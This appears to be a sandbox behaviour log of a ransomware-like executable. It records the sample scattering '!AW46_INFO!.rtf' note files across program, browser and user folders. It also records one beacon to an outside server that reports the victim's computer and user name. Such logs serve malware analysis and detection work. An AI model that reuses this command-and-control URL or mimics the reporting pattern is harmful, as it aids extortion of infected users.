7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Favorites\Links\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\db\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\images\cursors\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00008352\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\d5vrebxd.default-release\startupCache\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Favorites\Links for United States\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Favorites\Windows Live\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Pictures\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\deploy\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\83.0.4103.106\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tnk39ho.Admin\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Libraries\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Downloads\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZMLBLRQ7\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\jfr\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\amd64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Favorites\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Videos\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe HTTP URL 12 http://ghb.timerz.org/addrecord.php?apikey=aw46_api_key&compuser=AVGLFESB|Admin&sid=xz18piMEcQLJmCJV&phase=FINISH Process not Found File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\America\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\datareporting\archived\2020-06\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\default\moz-extension+++0b99e65e-22a6-4b3f-a101-8818eb39c6a0^userContextId=4294967295\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\fonts\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Recorded TV\Sample Media\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1131729243-447456001-3632642222-1000\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 